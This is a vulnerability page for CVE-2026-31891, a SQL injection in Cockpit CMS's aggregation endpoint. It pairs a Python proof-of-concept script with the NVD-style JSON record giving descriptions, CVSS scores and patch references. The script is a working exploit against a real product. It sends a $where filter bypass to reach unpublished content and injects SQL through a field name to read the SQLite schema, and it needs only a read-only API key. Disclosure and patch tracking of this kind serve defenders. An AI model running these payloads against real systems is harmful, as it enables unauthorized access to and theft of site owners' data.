CVE-2026-31891

# CVE-2026-31891 PoC - Cockpit CMS SQL Injection # Requires: Valid read-only API key # Target: /api/content/aggregate/{model} import requests import json TARGET_URL = "http://target.com/api/content/aggregate/posts" API_KEY = "your_readonly_api_key" # PoC 1: Bypass _state filter to access unpublished content payload = { "filter": { "$where": "1==1" }, "fields": { "title": 1, "_state": 1 }, "aggregate": [ { "$project": { "title": "$title", "state": "$_state", "content": "$content" } } ] } headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } response = requests.post(TARGET_URL, json=payload, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {json.dumps(response.json(), indent=2)}") # PoC 2: Extract data via SQL injection in field names injection_payload = { "aggregate": [ { "$project": { "data': 1, (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1))--": 1 } } ] } response2 = requests.post(TARGET_URL, json=injection_payload, headers=headers) print(f"Injection Response: {response2.text}")

{"cve": {"id": "CVE-2026-31891", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:19.570", "lastModified": "2026-03-20T18:00:37.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit is a headless content management system. Any Cockpit CMS instance running version 2.13.4 or earlier with API access enabled is potentially affected by a a SQL Injection vulnerability in the MongoLite Aggregation Optimizer. Any deployment where the `/api/content/aggregate/{model}` endpoint is publicly accessible or reachable by untrusted users may be vulnerable, and attackers in possession of a valid read-only API key (the lowest privilege level) can exploit this vulnerability — no admin access is required. An attacker can inject arbitrary SQL via unsanitized field names in aggregation queries, bypass the `_state=1` published-content filter to access unpublished or restricted content, and extract unauthorized data from the underlying SQLite content database. This vulnerability has been patched in version 2.13.5. The fix applies the same field-name sanitization introduced in v2.13.3 for `toJsonPath()` to the `toJsonExtractRaw()` method in `lib/MongoLite/Aggregation/Optimizer.php`, closing the injection vector in the Aggregation Optimizer."}, {"lang": "es", "value": "Cockpit es un sistema de gestión de contenido sin interfaz gráfica. Cualquier instancia de Cockpit CMS que ejecute la versión 2.13.4 o anterior con acceso a la API habilitado es potencialmente afectada por una vulnerabilidad de inyección SQL en el Optimizador de Agregación de MongoLite. Cualquier despliegue donde el endpoint `/api/content/aggregate/{model}` sea accesible públicamente o alcanzable por usuarios no confiables puede ser vulnerable, y los atacantes en posesión de una clave API de solo lectura válida (el nivel de privilegio más bajo) pueden explotar esta vulnerabilidad — no se requiere acceso de administrador. Un atacante puede inyectar SQL arbitrario a través de nombres de campo no saneados en consultas de agregación, eludir el filtro de contenido publicado `_state=1` para acceder a contenido no publicado o restringido, y extraer datos no autorizados de la base de datos de contenido SQLite subyacente. Esta vulnerabilidad ha sido parcheada en la versión 2.13.5. La corrección aplica la misma sanitización de nombres de campo introducida en la v2.13.3 para `toJsonPath()` al método `toJsonExtractRaw()` en `lib/MongoLite/Aggregation/Optimizer.php`, cerrando el vector de inyección en el Optimizador de Agregación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13.5", "matchCriteriaId": "B9672A33-EC5F-4489-892D-A63C0499AE5F"}]}]}], "references": [{"url": "https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.13.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Cockpit-HQ/Cockpit/security/advisories/GHSA-7x5c-vfhj-9628", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}